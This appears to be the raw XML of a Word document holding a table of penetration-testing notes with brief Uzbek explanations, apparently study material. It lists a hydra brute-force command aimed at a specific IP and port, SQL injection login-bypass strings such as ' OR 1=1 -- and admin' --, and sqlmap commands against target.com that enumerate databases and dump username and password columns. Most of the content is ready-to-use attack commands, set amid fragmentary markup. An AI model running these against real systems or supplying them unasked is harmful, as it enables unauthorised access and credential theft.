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13.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-6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"/>
        <w:gridCol w:w="2057"/>
        <w:gridCol w:w="7220"/>
        <w:gridCol w:w="5694"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="442"/>
            <w:gridCol w:w="2057"/>
            <w:gridCol w:w="7220"/>
            <w:gridCol w:w="5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page  brute force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hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -u -f 94.237.55.185 -s 45441 http-post-form "/login.php:username=^USER^&amp;password=^PASS^:F=&lt;form name='login'"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Rdp va ftp ga qilinayotgan hujumlarni brute force ishlatish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Owasp juice shop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‘ OR 1=1;--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login qismiga yozib buzib kirish komandasida ishlatiladi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 injection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sqlmap -u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563c1"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="28"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">http://target.com/index.php?id=1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--dbs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Saytdagi sql injection ni ishlatish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 injection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sqlmap -u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http://target.com/index.php?id=1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 -D database_name -T users --columns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Saytdagi sql injection ni ishlatish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 injection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sqlmap -u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http://target.com/index.php?id=1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" -D database_name -T users -C username,password --dump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Saytdagi sql injection ni ishlatish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Authentication Bypass (Kirishni chetlab o‘tish)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024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 OR 1=1 --  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 OR 1=1 --  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026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 OR '1'='1' --  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027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" OR "1"="1" --  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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admin' --  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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admin" --  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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admin' OR '1'='1' --  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B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sqlmap </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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-u "http://target.com/login.php" --data="username=admin&amp;password=123456&amp;submit=Login" -D users_db --tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F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sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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-u "http://target.com/login.php" --data="username=admin&amp;password=123456&amp;submit=Login" -D users_db -T users -C username,password --dump</w:t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851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C38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4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00B840A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target.com/index.php?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QTUN+2Bwd6PrOOqvCtdg8SDcwg==">CgMxLjAyCGguZ2pkZ3hzOAByITF0UmprWGVuWmFDZ0ZRZlhLdFlzcGpWYXZyQmR1Y0RYTA==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2025-03-03T04:37:00Z</dcterms:created>
  <dc:creator>0001</dc:creator>
</cp:coreProperties>
</file>